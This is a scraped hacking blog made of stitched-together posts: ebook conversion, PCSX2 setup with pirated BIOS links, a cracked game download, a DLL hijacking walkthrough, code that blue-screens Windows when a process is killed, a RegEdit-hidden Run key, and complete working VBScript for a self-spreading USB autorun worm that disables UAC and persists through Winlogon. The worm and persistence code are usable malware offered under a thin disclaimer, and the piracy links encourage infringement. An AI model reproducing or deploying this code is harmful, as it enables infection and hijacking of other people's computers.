How to make Keylogger in VB?

MAKING A KEYLOGGER IN VB6

THE INFORMATION PROVIDED BELOW IS SOLELY FOR EDUCATIONAL PURPOSES AND FOR SERVING THE OBJECTIVE OF THIS BLOG OF PROVIDING INFORMATION TO ITS READERS. THE BLOG IS NOT LIABLE FOR ANY DAMAGE CAUSED BY THE MISUSE OF THE INFORMATION(S) PROVIDED HEREIN

KNOWLEDGE REQUIRED: VISUAL BASIC 6

Lets Start:

Open a new Standard EXE Project in VB6

Disable the ControlBox
Set The ShowInTaskbar and Form1 Visibility to FALSE
Add a new Timer, By-Default and in this Post called Timer1
Add a new Label ,By-Default and in this Post called Label1

Add a Module

Convert pdf chm epub djvu to LIT

THIS TUTORIAL SHOWS YOU HOW TO CONVERT PDF TO LIT. FOLLOWING THIS TUTORIAL, YOU CAN CONVERT EBOOK (CHM, EPUB, PDF, ETC) TO MICROSOFT READER LIT FILES


.LIT File format belongs to Microsoft Reader Files. The ebooks of this type are small in size compared to other Reader Files such as PDF and ePub. Microsoft had released an Add-in for Word that could convert MS Document Files (.DOC) to Microsoft Reader Files(.LIT). Turned out that it was incompatible with MS Word 2007 and above and no update had been released to solve it. As I used Microsoft Office 2007, I couldn't use WordRMR, the Microsoft Word Add-in to convert Document Files to Microsoft Reader Files.

And, after hours of searching, I finally found some Converters that could convert Text to LIT Files.

       Txt2Lit
Txt2Lit is a command Line Tool to convert Text Files to Microsoft Reader (.LIT) Files. The Converter needs to be invoked from Command Line (CMD) and needs source and destination File-path. The Converter Additionally also supports setting Author Name and Book Title.

txt2lit [/?] [/1251|/koi8|/866] [/f] [/s] [/a"author"] [/t"title"] [/h["File.DLL"]] <text file> [lit file]
Download Txt2Lit

            Michisoft Reader Studio
Michisoft Reader Studio is a Graphical User Interface Application capable of converting HTML Files (.HTM), Rich Text Files (.RTF), JPG Image Files (.JPG) and Notepad Text Files (.TXT) to Microsoft Reader Files (.LIT). Reader Studio can additionally also set Cover Page, Thumbnail, Title, Author, Publisher, Identifier, Description, Date, Conributor, Source, Subject, Type and many more.

Download Michisoft Reader Studio

           WordRMR
WordRMR is the Microsoft Reader Converter Add-in for Micorosft Word 2002. It is incompatible with MS Word 2007 but, there are some rumors that it work with Microsoft Word 2007 too. There is no guarantee that it will work with Microsoft Word 2007
Download WordRMR

Calibre
Calibre is the best amongst all that have been mentioned and or referred in this post. Calibre is a free open-source ebook software for saving, organizing and managing ebooks. It also supports various file formats. It can also convert PDF to LIT, Epub and many more. It also contains an Ebook viewer, Ebook-Manager, etc.

Running Calibre Setup
Calibre Ebook Viewer

Converting to LIT with Calibre:

Run calibre - E-book management[Start -> All Programs -> calibre - E-book Management]
Click Add Ebooks
Click Convert Ebooks
Choose Output Format
Click Ok


Obtain the Converted File from C:\Documents and Settings\$USERNAME$\Calibre Library 
Download Calibre

Additionally you may want to convert LIT Files to other File Formats, if so, you may want to try ABC Amber LIT. ABC Amber LIT Converter is an advanced utility which can convert LIT Files to PDF, CHM, RTF, HLP, DOC, HTML and many more other formats.

Download ABC Amber LIT Converter

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

Setting PCSX2


PCSX2 is the best and the most popular and stable Playstation2 Emulator available on the World Wide Web. This is a tutorial on how you can setup PCSX2 and get started with PCSX2 to start gaming PS2 games on PC right away.
Firstly download PCSX2. The Current Stable Version at the time of writing this article is PCSX2 v0.9.8. Download the Binary Archive like so:
DOWNLOADING PCSX2
PCSX2 needs to have a copy of Playstation 2 BIOS installed in the \bios\ directory to run the PS Games. Since the PS2 BIOS is a private and copyrighted property of SONY, any free-distribution and or trade of PS2 BIOS without permission from SONY would be (is) considered illegal. And, the PCSX2 User is actually supposed to obtain his copy of PS2 BIOS via PS2 Bios Dumping for use with PS2 Emulators.
http://forums.ngemu.com/showthread.php?t=84994
But, with a bit of search in google, one can easily obtain a copy of PS2 BIOS. So, here are couple of download links for you to download PS2 BIOS from:
RapidShare(Link2)

So, lets visit Emu-Russia, and download the BIOS. In the Snapshot below, as you can see I’ve only downloaded the upper one (the Japanese Version) but, you can as well keep both the copies, the Archive is to be extracted and you’ll get a 4 MB BIOS file named scph10000.bin. Now copy the BIN file to X:\PCSX2-INST-DIR\Bios\
DOWNLOADING THE BIOS
 Now run pcsx2-r4600.exe in the PCSX2 Folder. Then, you’ll see the PCSX2 First Time Configuration Window. Go ahead and click Next with a check on Use Default Settings. Please note that the Default Configurations maynot work with some machines and may need some additional tweaks as your Machine’s Performance Ability is what matters here. Please refer to this page for PCSX2 best-performance Configuration.
Now, if your DirectX library is not up-to-date, the PCSX2 Configuration Wizard will ask you to update one.
GSDX UPDATE
So, go ahead and download the latest version of DirectX from the Microsoft Download Center.
MICROSOFT DIRECTX DOWNLOAD
The Next Window that you will see is the BIOS Selection Window. If you have not yet downloaded the BIOS and installed it in you \bios\ folder, then you will find that the List Box is empty.
 
So, download a copy of BIOS and install it in the \bios\ Folder. Remember that I have already mentioned earlier in this post that I’ve downloaded the Japanese Version of BIOS from Emu-Russia. So, if you too installed the Japanese Version, then you should see the following:
JAPANESE BIOS SELECTION
Then, you should click Finish and you should see the PCSX2 Main Window along with the Console and or Program Log Window like so:
PCSX2 MAIN WINDOW
Then click CDVD -> Iso Selector -> Browse and you should see the following window:
PCSX2 BROWSE CDVD IMAGE
And, you should be see the game running right away.
RUNNING MANHUNT IN PCSX2
PLEASE NOTE THAT THIS IS JUST A TUTORIAL, A GUIDE FOR BEGINNERS TRYING TO SETUP PCSX2. AND, SOME OF THE STEPS PROVIDED HERE (MAY) HAVE NOT BEEN FOLLOWED AT THE TIME OF WRITING THIS ARTICLE

HERE IS AN UPDATED VERSION OF THIS POST.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

Learn VBScripting - How to learn Visual Basic Scripting ?

LEARN VISUAL BASIC SCRIPTING
What you will need:

A Good Script Editor
The first thing that you’ll need is a good editor. The best that you’ll find around is the one called VBSEdit. VBSEdit is a commercial VBScript Editor but, the Trial period never expires and you will find that VBSEdit is a perfect companion for VBScripters.
The VBSEdit Package comes along with an HTAEdior. It has tons of samples, a good Text editor features like Syntax Highlighting, Code Completion, Object Browser, it also supports setting BreakPoints and also features debugger. With it, you can even Test-Run the Script on the go.

VBSEdit
VBSEdit Trial Info-Box
VBSEdit Samples
VBSEdit Samples
VBSEdit Code Completion
VBSEdit Code Completion
VBSEdit Code Completion
An Ebook for learning VB Scripting

                VBSEdit also contains a compiled Help File called Script56. Script56 is a perfect companion for learning Visual Basic Scripting. Script56 can be a perfect guide for beginners and at the same time, a perfect   reference for average and advanced Scripters alike.

You can additionally read a Book called Microsoft VBScript Step By Step from Microsoft Press which is the best that is available for learning VBScript. It teaches Visual Basic Scripting Step By Step.

MS VBSCRIPT STEP BY STEP
MS VBSCRIPT STEP BY STEP in Amazon


PLEASE NOTE THAT AVIRA MAY FALSELY DETECT VBSEDIT.EXE AS MALWARE AND PREVENT ANY ACCESS TO IT. PLEASE BE AWARE THAT IT IS JUST A FALSE POSITIVE

Avira False Positive

Learn how virus works and defend yourself from them here.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

Manhunt Game - Download for PC


Manhunt is a single player stealth horror game. There are 20 levels out of which the last 3 are bonuses. The Game's main character is James Earl Cash.  The Game becomes bloodier along with the game progress. The first level contains fast and blood-less ways of execution of enemies like: Plastic Bag for suffocation and progressively moves to Wires for stealth execution, Nail-Guns, Revolvers, Blades, Base-ball bats, glass shards etc. The Player has to hide in the shadows and execute the enemies without getting their HP down or letting the enemy raise alarm.



Minimum Requirements:
                256 MB Physical Memory (RAM)
                32 MB Video Memory
                900 MB HDD Space
This is a Torrent Link and this one is a Mediafire link(190 MB).

Please Note that Avira may falsely detect Manhunt.exe as TR/Rootkit.Gen. It is only a false-positive.

And here are the screenshots of the Game:


The Player carrying the dead body of an enemy (called hunter in the game)
This game has been banned in a number of countries due to excessive gore and violence and it's possession may be considered an offense in those countries.

Manhunt Crack for Windows Vista



THE REAL CREDIT GOES TO THE RESPECTIVE UPLOADERS

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

How to-Map network drive in XP? Share Drives & Folders in Windows OS

1. Make sure both your PC and the PC you want to share your Drive / Folder with are on the same LAN
2. Both Computers must be of same WorkGroup([MY COMPUTER] -> [PROPERTIES] -> [COMPUTER NAME] -> [WORKGROUP]) Name (Optional) and Password Protection must be off.


Turn Password Protecting off.
 3.    Don't forget to obtain the name of the Computer you are connecting to.
4.    Right Click the Folder / Drive icon you want to share.
 Now, goto the Sharing TAB and:
                                (a) Click on Share this folder on the NetWork
                                (b) Allow network users to change my file
5. Check the Option 4.(b) only if you want to be able to write on the Shared Drive from the Other PC you are sharing the Drive / Folder with. And, also don't forget the 'Share-Name', we will need it too.  Same goes for the folder too.
6.  Now, open My Computer from the Second PC and Click [TOOLS] -> [MAP NETWORK DRIVE]. A new window called 'Map Network Drive' will show up.
7.  Now, Choose any un-assigned Drive-Letter and type:
 \\COMPUTERNAME-TO-SHARE-WITH\Share-Name
9. Click [FINISH]. And, it will show up as a Network Drive.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

W32.Induc Worm - Sourcecode


ATLEAST BASIC KNOWLEDGE OF OBJECT PASCAL IS REQUIRED. THIS SOURCECODE IS FOR THOSE WHO ARE CURIOUS ABOUT HOW W32.INDUC WORM ACTUALLY WORKS.
This is a Delphi Virus which infects the Executables at compile time.
W32/Induc-C is a virus infecting executable files and core source units of the Delphi compiler.
W32/Induc-C includes functionality to spread via removable drives.
Please note that the infection of Delphi installations means that infected software developers will be producing software infected at compile time. Therefore, as with Mal/Induc-A and W32/Induc-A, there may be detections of W32/Induc-C and Mal/Induc-D on software published by legitimate software houses. These are not false positives. Customers with infected software should contact the software vendor to inform them of the infection and ask the vendor to clean up their Delphi installation and compile new, clean versions of the software.
Source: Sophos
W32.Induc is a worm making rounds these days, the worm is known to attack the software development phase by putting its malicious code in to the Delphi library files thus adding itself to the compilation process. Thereafter, any file compiled with the infected Delphi compiler will also be infected.
Source: McAfee
And here is the Page with the Source-code.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

MyDoom.A - Sourcecode of MyDoom worm

Discovered: January 26, 2004
Updated: February 13, 2007 12:16:57 PM
Also Known As: W32.Novarg.A@mm, W32/Mydoom@MM [McAfee], WORM_MIMAIL.R [Trend], Win32.Mydoom.A [Computer Assoc, W32/Mydoom-A [Sophos], I-Worm.Novarg [Kaspersky]
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


W32.Mydoom.A@mm (also known as W32.Novarg.A) is a mass-mailing worm that arrives as an attachment with the file extension .bat, .cmd, .exe, .pif, .scr, or .zip.

When a computer is infected, the worm sets up a backdoor into the system by opening TCP ports 3127 through 3198, which can potentially allow an attacker to connect to the computer and use it as a proxy to gain access to its network resources.

In addition, the backdoor can download and execute arbitrary files.
There is a 25% chance that a computer infected by the worm will perform a Denial of Service (DoS) on February 1, 2004 starting at 16:09:18 UTC, which is also the same as 08:09:18 PST, based on the machine's local system date/time. If the worm does start the DoS attack, it will not mass mail itself. It also has a trigger date to stop spreading/DoS-attacking on February 12, 2004. While the worm will stop on February 12, 2004, the backdoor component will continue to function after this date.

Source: Symantec
MyDoom.A Sourcecode.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

DLL Hijacking

THIS ARTICLE ASSUMES THAT THE READER IS FAMILIAR WITH WINDOWS PROGRAMMING


Due to a vulnerability commonly known as DLL hijacking, many programs will load and execute a malicious DLL contained in the same folder as a file on a remote system. The vulnerability was discovered by HD Moore, who has published an exploit for the open-source based penetration testing software Metasploit.
Source: Wikipedia

DLL HIJACKING also known as DLL Path Injection is a very popular method in which an application known to be vulnerable is (ab)used to use it as a loader of a malicious DLL. The way it works is that a DLL with a same name which same exports same functions  is placed in the directory in which the application or the associated file which the application will load. The main idea is that the application will load our library instead of the original in it’s memory using LoadLibrary() function exported by KERNEL32.DLL thus calling the malicious code in the DLL’s entry-point (DLLMain or DllEntryPoint) which contains our malicious payload.

#include <windows.h>

/*           COMPILE(D) WITH LCC   */

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
                if (dwReason == DLL_PROCESS_ATTACH)
                {
                                MessageBox(0,"DLL Attached","DLL Message", 0);
                }
                else if (dwReason == DLL_PROCESS_DETACH)
                {
                                MessageBox(0,"DLL Detaching","DLL Message", 0);
                }
                if (dwReason == DLL_THREAD_ATTACH)
                {
                                MessageBox(0,"DLL Thread Attached","DLL Message", 0);
                }
                else if (dwReason == DLL_THREAD_DETACH)
                {
                                MessageBox(0,"DLL Thread Detaching","DLL Message", 0);
                }
return TRUE;
}
''  COMPILE AS: fbc PATH-TO-FILE.BAS -dll -Wl " -entry _DllEntryPoint@12"

#include "windows.bi"
Function DllEntryPoint stdcall Alias "DllEntryPoint" (hInstDLL As HINSTANCE, _
                                dwReason As DWORD, lpvReserved As LPVOID) As BOOL Export
                if (dwReason = DLL_PROCESS_ATTACH) then
                                MessageBox(0,"DLL Attached","DLL Message", 0)
                elseif (dwReason = DLL_PROCESS_DETACH) then
                                MessageBox(0,"DLL Detaching","DLL Message", 0)
                elseif (dwReason = DLL_THREAD_ATTACH) then
                                MessageBox(0,"DLL Thread Attached","DLL Message", 0)
                else
                                MessageBox(0,"DLL Thread Detaching","DLL Message", 0)
                End if
return TRUE
End Function     












In the sample codes above, the first one is to be compiled in C and / or the second one is to be compiled in FreeBasic.

PROCEDURES FOR DLL HIJACKING:

First, find a vulnerable software and the associated DLL name which it is bound to load. A list of all Vulnerable Softwares along with their associated DLL Names can be found here.

One of the vulnerable softwares was Videolan VLC Media Player. The Software has been patched now. But, this doesnot mean that the old versions are immune. VLC Media Player V1.0.3 is vulnerable and so is a software called Xilisoft. Both of these have same Dll loading that is: Wintab32.DLL. Visual Basic 6 IDE is also vulnerable. The VB6 IDE loads a DLL called vb6ide.dll.

TRYING OUT DLL HIJACKING:

This one is for Videolan VLC Media Player V1.0.3:
1.      Install VLC Media Player (Unpatched Version). Note that VLC has an official statement   regarding the patching of the vulnerability and the software is no more vulnerable.
2.      Copy a MP3 File to some folder on the Computer (eg. X:\SOMEFOLDER\SOMEFILE.MP3).
3.      Compile the aboe code to DLL and rename the DLL as WINTAB32.DLL and now, open the MP3 file. And, you should see MessageBox popup saying DLL ATTACHED.
Note:
1.      It is upto you to either export all the functions or simply compile ony the malicious code. Depending on the Software and situation, the program may crash after your DLL has been loaded if you don’t export all those funtions thatthe program is known to use.
2.      The DLL will be loaded in the above scenario and the MP3 file will keep on playing as on VLC V1.0.3.
3.      Just to try out the demo in VLC, it is not necessry that you have a real MP3 file. You may create a Text Document and append.MP3 in it’s extentsion (change the extension from Text Document to that of MP3) and load the file.
And, you should see the Messagebox like in the Snapshot above
Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

Make Process unstoppable


Some of the ways to make a process un-terminable are:
  1. Rename your Process to one of these: smss.exe, lsass.exe or csrss.exe. Note that this method only works on Pre-Windows 7 Releases and your process will simply get terminated when you try it in Windows 7. If it is Vista or earlier, one will see the ACCESS DENIED error when he tries to terminate the process named any of the above.
  2. Use the Win32 API Call called RtlSetProcessIsCritical(). It is exported by NTDLL.DLL and the Operating System will suffer a Blue Screen of Death if one terminates the process.
  3. Use the API called SetKernelObjectSecurity() it's effect will be same as the first option, one will see the ACCESS DENIED. 
CSRSS.EXE on directory other that System32 sounds suspicious to AVs.


 #include "windows.bi"

Dim As HMODULE hNTDLL = LoadLibrary("Ntdll")
Dim RtlCritical As Function (As BOOL, As BOOL, As BOOL) As Long
    RtlCritical = Cast(Long, GetProcAddress(hNTDLL, "RtlSetProcessIsCritical"))
    Dim As HANDLE hToken
    Dim As luid LUID
    Dim As TOKEN_PRIVILEGES tkpriv
    ZeroMemory(@tkpriv, sizeof(tkpriv))
    If (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, @hToken)) Then
        If (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, @luid)) Then
            tkpriv.PrivilegeCount = 1  
            tkpriv.Privileges(0).Luid = luid
            tkpriv.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
            AdjustTokenPrivileges(hToken,FALSE, @tkpriv, sizeof(tkpriv), NULL, NULL)
            CloseHandle(hToken)
            RtlCritical(TRUE, NULL, FALSE)
        Else
            CloseHandle(hToken)
        EndIf
    EndIf  
FreeLibrary(hNTDLL)
The above is the Freebasic Version of RtlSetProcessIsCritical(). Under UAC, you will need to run as Administrator or the Code won't work. The result is a BSOD in case the Process is terminated.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

Hide Registry Key

The Hiding of Registry Key in this Article is done by exploiting a vulerability in REGEDIT. The function is exploited by creating a key with the string value whose length will be greater than 260 bytes.
This vulnerability is useful only for RegEdit and RegEdit32 and not other softwares like Ccleaner and regutil as they use buffer length greater than 260 which makes the Registry visible to them. While RegEdit uses Buffer length equal to 260 only, we create a key with string length with 261 or greater and hopefully get it invisible. This is a co-incidental design flaw rather than a bug. This trick should make our Key invisible and at the same time, run the Dummy file (which in the real world would be the malware) faithfully during the startup. This Vulnerability is reportedly being exploited by a malware in the wild.

So, below is the V(isual) B(asic) S(cript) Code that should do the trick:

Const Alphabets = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
Dim Shell, my_lengthy_string, i
Set Shell = CreateObject("WScript.Shell")
my_lengthy_string = Alphabets
For i = 0 to 10
                my_lengthy_string = my_lengthy_string & Alphabets
Next
Shell.RegWrite "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run\" _
                & my_lengthy_string, "C:\DUMMY.EXE", "REG_SZ"
Set Shell = Nothing
And you can clearly see the consequence in the Snapshot above. The Registry Key in Red Highlight is produced by the VBS Code posted above. The Hidden Registry Key was caught by Anti-Rootkit Tool called GMER. While the same Registry Key is nowhere to be found in the RegEdit.

Learn how you can make a Virus in VBS

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

How to make Autorun Virus in VBScript

THIS IS A BASIC FRAMEWORK OF A VBS AUTORUN VIRUS. THIS IS FOR THOSE WHO WANT TO KNOW HOW AUTORUN VIRUSES ACTUALLY WORK SO THAT THEY CAN DEFEND THEMSELVES AGAINST SUCH THREATS
THIS IS A BASIC FRAMEWORK OF VBS AUTORUN WORM DETECTED AS GENERIC.SCRIPTWORM, WORM/VBS, VBS.SASAN.A, VBS.SOLOW AND VBS:AGENT-JF[WRM]. THE VIRUS NORMALLY WORKS UNDER PRE-WINDOWS 7 RELEASES (UPTO WIN-VISTA) BECAUSE AUTORUN.INF DOESN'T WORK IN WINDOWS 7 IN USB DRIVES. BUT, IF MANUALLY RUN (FROM WSCRIPT) THEN IT CAN INFECT WINDOWS 7 TOO. IF THE READER WANTS TO TEST IT, S/HE MAY DO SO ONLY UNDER SAFE ENVIRONMENT (UNDER VIRTUALBOX OR VIRTUAL PC) ISOLATED FROM THE HOST ENVIRONMENT TO PREVENT SELF-INFECTION


Option Explicit
Const script_eng = "wscript.exe -e:VBScript "
Dim i
Dim fso, Shell, tfile
Dim HIVES
Dim Tempdir, Systemdir
Dim myfolder, myfile, mypath, mycode, auto_inf
Dim userinit, device

On Error Resume Next

Set Shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.Filesystemobject")
                                Set myfile = fso.GetFile(WScript.ScriptFullName)
                                mycode = myfile.OpenAsTextStream(1, - 2).ReadAll
                                Set myfolder = myfile.ParentFolder
                                If (Right(myfolder, 1) <> "\") Then _
                                                   myfolder = myfolder & "\"
                                mypath = myfolder & myfile.Name
                                If (myfile.ParentFolder = myfile.Drive.Path & "\RECYCLER") Then _
                                             Shell.Run("explorer.exe " & myfile.Drive.Path & "\")
                                Set myfile = Nothing
                                HIVES = Array("HKEY_CURRENT_USER\", "HKEY_LOCAL_MACHINE\")
                                Set Systemdir = fso.GetSpecialFolder(1)              
                                Set Tempdir = fso.getspecialfolder(2)
                                userinit = Systemdir & "\userinit.exe," & Systemdir & "\" _
                                                                  & script_eng & Systemdir & "\thumb.db"
                                                                 
auto_inf = "[AUT" & "ORUN]" & vbCrLf
auto_inf = auto_inf & "ShellEx" & "ecute=" & script_eng & "RECYCLER\thumb.db"
auto_inf = auto_inf & vbcrlf & "Action=Ope" & "n folder t" & "o view files" & vbCrLf
auto_inf = auto_inf & "Shell\Forma" & "t...\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\" & "Open\" & "Comman" & "d=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\Expl" & "ore\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "ico" & "n=shell32.dll,4"
copy_in_system()
 Do
         regcreate()        
         infect_devices()
         self_regen()
                               
         If ((myfolder = Systemdir & "\") Or (myfolder = Tempdir & "\")) Then _
                                 WScript.Sleep(1000)
Loop While ((myfolder = Systemdir & "\") Or (myfolder = TempDir & "\"))
Virus residing in the System Folder


Function regcreate()
For i = 0 To 1
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", userinit, "REG_SZ"
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AudioSvc", script_eng & Tempdir & "\thumb.db", "REG_SZ"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", 0, "REG_DWORD"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\" _
     & "Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
Next
End Function
The Registry-Key modified by the Worm
Function infect_devices()
For Each device In fso.Drives
      If ((device.DriveLetter <> "A") And (device.DriveLetter <> "B")) Then
            If ((device.DriveType = 1) Or (device.DriveType = 3)) Then
                If (device.IsReady) then
                     If (fso.FolderExists(device.Path & "\Autorun.inf")) Then _
                            fso.DeleteFolder(device.Path & "\Autorun.inf"), True
                     If (Not fso.FolderExists(device.Path & "\RECYCLER")) Then _
                            fso.CreateFolder(device.Path & "\RECYCLER").Attributes = 39
                            fso.GetFolder(device.Path & "\RECYCLER").Attributes = 39
                     If (Not fso.FileExists(device.Path & "\RECYCLER\thumb.db")) Then
                            write_file device.Path & "\RECYCLER\thumb.db", mycode                      
                     Else
                         If (fso.OpenTextFile(device.Path & "\RECYCLER\thumb.db", 1).ReadAll _
                                        <> mycode) Then
                             fso.DeleteFile(device.Path & "\RECYCLER\thumb.db"), True
                             write_file device.Path & "\RECYCLER\thumb.db", mycode
                         End If
                    End If
                If (Not fso.FileExists(device.Path & "\Autorun.inf")) Then
                    write_file device.Path & "\Autorun.inf", auto_inf
                Else
                      If (fso.OpenTextFile(device.Path & "\Autorun.inf", 1).readAll <> auto_inf) Then
                         fso.DeleteFile(device.Path & "\Autorun.inf"), True
                         write_file device.Path & "\Autorun.inf", auto_inf
                      End If
                End If
            End If
         End If
      End If
Next
End function

Function write_file(fpath, fcode)
Set tfile = fso.CreateTextFile(fpath)
tfile.Write(fcode)
tfile.Close
fso.GetFile(fpath).Attributes= 39                                                                                                                            
End Function

Function self_regen()
                If (Not fso.FileExists(mypath)) Then
                         write_file mypath, mycode
                Else
                         If (fso.OpenTextFile(mypath, 1).readAll <> mycode) Then
                                     fso.DeleteFile(mypath), True
                                     write_file mypath, mycode
                         End If
                End If
End Function

Function copy_in_system()
                If (Not fso.FileExists(Systemdir & "\thumb.db")) Then
                              write_file Systemdir & "\thumb.db", mycode
                              Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                Else
                               If (fso.OpenTextFile(Systemdir & "\thumb.db", 1).readAll <> mycode) Then
                                      fso.DeleteFile(Systemdir & "\thumb.db"), True
                                      write_file Systemdir & "\thumb.db", mycode
                                      Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                               End If
                End If
                If (Not fso.FileExists(Tempdir & "\thumb.db")) Then
                                write_file Tempdir & "\thumb.db", mycode
                                Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                Else
                                If (fso.OpenTextFile(Tempdir & "\thumb.db", 1).readAll <> mycode) Then
                                               fso.DeleteFile(Tempdir & "\thumb.db"), True
                                               write_file Tempdir & "\thumb.db", mycode
                                               Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                                End If
                End If   
End function

The Snapshot above catches the scenario when the Virus is detected by Avast AntiVirus.
And here is what the infected device will have –An Autorun.inf file, and a companion file in the \RECYCLER\ folder, the autorun.inf is the file that actually starts the worm when interacted by user.
The Process WSCRIPT.EXE running which hosts the Viral Script.
Want to know what exactly happens when the Code runs ?
Well then have a look at this Flow Chart and learn the logic and the flow of control of the VBS Autorun Virus:
VBS Autorun Virus - FlowChart
Changing the Folder Icon:

RECYCLER folder icon

So, the folder 'RECYCLER' in which the worm resides shouldnot have a normal folder icon. Since it's name is 'RECYCLER', it's icon should resemble a RECYCLE BIN icon. To change the folder icon, we have to create a file called 'desktop.ini' inside the folder  and it needs to have the following code:
[.ShellClassInfo]
IconResource=%windir%\system32\Shell32.dll,32
The IconResource refers to the icon with index no.32 from inside the Shell32 DLL. As you can see in the picture below, thumb.db(the worm itself) is accompanied by a desktop.ini file inside the RECYCLER folder. Assuming that you can read & write VBScripts and provided that we have already shown how you can create the worm itself, it should not be a difficult job for you to add a few more lines of VBS code to create the desktop.ini file.

desktop.ini in RECYCLER folder

Instead of updating the Code of the worm in this post itself, we have included link for downloading a sample of thumb.db worm. You can download the sample from here.


The ability of the Worm can be expanded to running of Virus when opening the Inf file from Edit or clicking [RIGHT_CLICK] + DELETE. This is achieved by Altering the default registry Value of the associated File Extension in Registry in HKEY_CLASSES_ROOT. Under HKCR, '{EXTENSION + 'file'}\Shell\open\Command\' to your VIRUS-FULL-PATH with all the parameters needed. For eg. Here I will show what is needed to make the Virus get executed when you [RIGHT_CLICK] + EDIT : HKEY_CLASSES_ROOT\vbsfile\Shell\Edit\Command\, PATH-TO-VIRUS, REG_EXPAND_SZ.
Now, after you alter the registry under HKEY_CLASSES_ROOT, the default behaviour of the File Extension Explorer Menu will change.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google